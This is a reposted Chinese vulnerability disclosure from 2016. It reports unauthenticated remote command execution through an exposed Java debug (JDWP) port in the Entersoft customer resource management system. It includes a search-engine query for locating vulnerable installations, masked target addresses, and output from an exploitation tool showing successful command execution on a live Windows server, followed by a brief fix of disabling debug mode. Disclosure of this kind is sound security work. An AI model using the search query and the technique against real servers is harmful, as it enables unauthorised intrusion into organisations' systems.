神刀安全网

漏洞标题: 浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

漏洞详情

披露状态:

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-29: 厂商已经确认,细节仅向厂商公开
2016-05-09: 细节向核心白帽子及相关领域专家公开
2016-05-19: 细节向普通白帽子公开
2016-05-29: 细节向实习白帽子公开
2016-06-13: 细节向公众公开

简要描述:

浙大恩特网络科技有限公司成立于2002年2月份,隶属于浙江大学国家大学科技园,是浙江省高新技术产业重点企业,公司立足于为中国外向型企业提供管理软件系统的设计以及研发和咨询服务。

经过八年多的发展,公司已经拥有了“客户资源管理系统”、“外贸出口业务管理系统”、“外贸进销存管理系统”、“网络监控管理系统”、“网络传真管理系统” 等一系列专门面向外向型企业的管理软件。 其中“浙大恩特客户资源管理系统” 经多年市场检验,已经成为国内技术领先 、功能最强 、口碑最佳的外贸客户管理软件,为广大的进出口公司、自营出口的生产企业解决了客户资源及邮件传真等联系管理的难题, 增加出口订单,并大大提高了工作效率,得到了广泛的好评。

详细说明:

附大量案例

在百度构建关键字即可:

intitle:欢迎使用浙大恩特客户资源管理系统

漏洞标题:  浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

开启端口根据每台服务端情况不同

漏洞标题:  浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

code 区域
**.**.**.**:81/
http://**.**.**.**/
http://**.**.**.**/
**.**.**.**/
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**

漏洞证明:

漏洞标题:  浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

漏洞标题:  浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

code 区域
[+] Targeting '**.**.**.**:8787'
[+] Reading settings for 'Java HotSpot(TM) Server VM - 1.7.0_40'
[+] Found Runtime class: id=2405
[+] Found Runtime.getRuntime(): id=3dc1b124
[+] Created break event id=2
[+] Waiting for an event on '**.**.**.**.ServerSocket.accept'
[+] Received matching event from thread 0x34eb
[+] Found Java Virtual Machine specification vendor 'Oracle Corporation'
[+] Found Java Runtime Environment specification name 'Java Platform API Specifi
cation'
[+] Found Path of extension directory or directories 'D:/EnterCRM/jdk1.7.0_40/jr
e/lib/ext;C:/Windows/Sun/Java/lib/ext'
[+] Found Java Runtime Environment specification vendor 'Oracle Corporation'
[+] Found Java Virtual Machine specification version '1.7'
[+] Found Operating system name 'Windows Server 2008 R2'
[+] Found Default temp file path 'C:/Windows/TEMP/'
[+] Found User's current working directory 'D:/EnterCRM/bin'
[+] Found Java installation directory 'D:/EnterCRM/jdk1.7.0_40/jre'
[+] Found User's account name 'QZ-DUNTUO$'
[+] Found Java Virtual Machine implementation vendor 'Oracle Corporation'
[+] Found Java Runtime Environment vendor 'Oracle Corporation'
[+] Found Path separator ';'
[+] Found Java vendor URL 'http://**.**.**.**/'
[+] Found Java class path 'D:/EnterCRM/bin/run.jar'
[+] Found Java Runtime Environment specification version '1.7'
[+] Found Operating system version '6.1'
[+] Found Operating system architecture 'x86'
[+] Found Java Runtime Environment version '1.7.0_40'
[+] Found Java Virtual Machine implementation version '24.0-b56'
[+] Found Java Virtual Machine specification name 'Java Virtual Machine Specific
ation'
[+] Found File separator '/'
[-] **.**.**.**piler: Unexpected returned type: expecting String
[+] Found Java class format version number '51.0'
[+] Found List of paths to search when loading libraries 'D:/EnterCRM/jdk1.7.0_4
0/bin;C:/Windows/Sun/Java/bin;C:/Windows/system32;C:/Windows;D:/EnterCRM/jdk1.7.
0_40/bin;C:/Windows/system32;C:/Windows;C:/Windows/System32/Wbem;C:/Windows/Syst
em32/WindowsPowerShell/v1.0/;C:/Program Files (x86)/Sybase/SQL Anywhere 9/win32;
C:/Program Files (x86)/Sybase/Shared/win32;C:/Program Files (x86)/Sybase/SQL Any
where 9/drivers;C:/Program Files (x86)/Sybase/Shared/Sybase Central 4.3/win32;;.
'
[+] Found Java Virtual Machine implementation name 'Java HotSpot(TM) Server VM'
[+] Found User's home directory 'C:/'
[!] Command successfully executed

要是windows系统的话,默认开启3389端口,直接执行命令即可,可直接获取服务器权限

修复方案:

关闭调试模式

版权声明:转载请注明来源 Aasron@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址